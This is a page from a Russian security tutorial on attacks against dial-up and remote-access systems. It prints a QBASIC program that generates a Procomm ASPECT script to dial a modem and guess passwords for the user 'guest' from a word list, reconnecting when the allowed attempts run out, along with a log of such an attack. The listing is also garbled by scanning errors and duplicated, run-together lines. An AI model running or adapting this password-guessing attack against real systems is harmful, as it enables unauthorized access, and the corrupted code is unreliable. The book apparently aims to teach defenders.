Иллюстрированный самоучитель по Secure Web


Уязвимость удаленных соединений, PBX, VOICEMAIL и виртуальных частных сетей - часть 24


DO UNTIL EOF(l)

LINE INPUT #1, in$

in$ = LTRIM$(in$) + "ЛМ" PRINT #2, "waitfor " + CHR$(34) + "
Username:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + "
guest" '+ CHR$(34)

PRINT #2, "waitfor " + CHR$(34) + "
Password:" + CHR$(34)

PRINT tt2, "transmit " + CHR$(34) + in$ + CHR$(34)

LOOP

PRINT #2, "endproc"

Двойная идентификация, ограниченное число попыток


Четвертый домен является развитием третьего. Доя проникновения в систему четвертого домена требуется угадать имя пользователя и пароль при ограниченном числе попыток. После неудачного использования заданного числа попыток требуется восстановить разорванное соединение. Рассмотрим пример работы системы и программу генерации соответствующего сценария. В следующем листинге содержатся результаты атаки целевой системы. 

XX-Jul-XX 09:55:08 91ХХХ5551234
С: CONNECT 9600/ARQ/V32/LAPM

Username: guest

Password: xxxxxxxx

Username: guest

Password: xxxxxxxx

Username: gues.t

Password: xxxxxxxx

+++

А вот пример QBASIC-программы, генерирующей сценарий на языке ASPECT.

OPEN "5551235.was" FOR OUTPUT AS #2

OPEN "LIST.txt" FOR INPUT AS #1

PRINT #2, "proc main"

DO UNTIL EOF(l) PRINT #2, "dial
DATA " + CHR$(34) + "5551235" + CHR$(34)

LINE INPUT #1, in$

in$ = LTRIMS(in$) + "ЛМ"

PRINT #2, "waitfor " + CHR$(34) + "
Username:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + "
guest" + CHR$(34)

PRINT #2, "waitfor " + CHR$(34) + "
Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)

LINE INPUT #1, in$

in$ = LTRIM$(in$) + "ЛМ" PRINT #2, "waitfor " + CHR$(34) + "
Username:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + "
guest" + CHR$(34)

PRINT #2, "waitfor " + CHR$(34) + "
Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + in$ + CHRS(34)

LINE INPUT #1, in$

in$ = LTRIM$(in$) + "AM"

PRINT #2, "waitfor " + CHR$(34) + "
Username:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + "
guest" + CHR$(34)

PRINT #2, "waitfor " + CHR$(34) + "
Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) LOOP PRINT #2, "endproc"





Начало  Назад  Вперед



Книжный магазин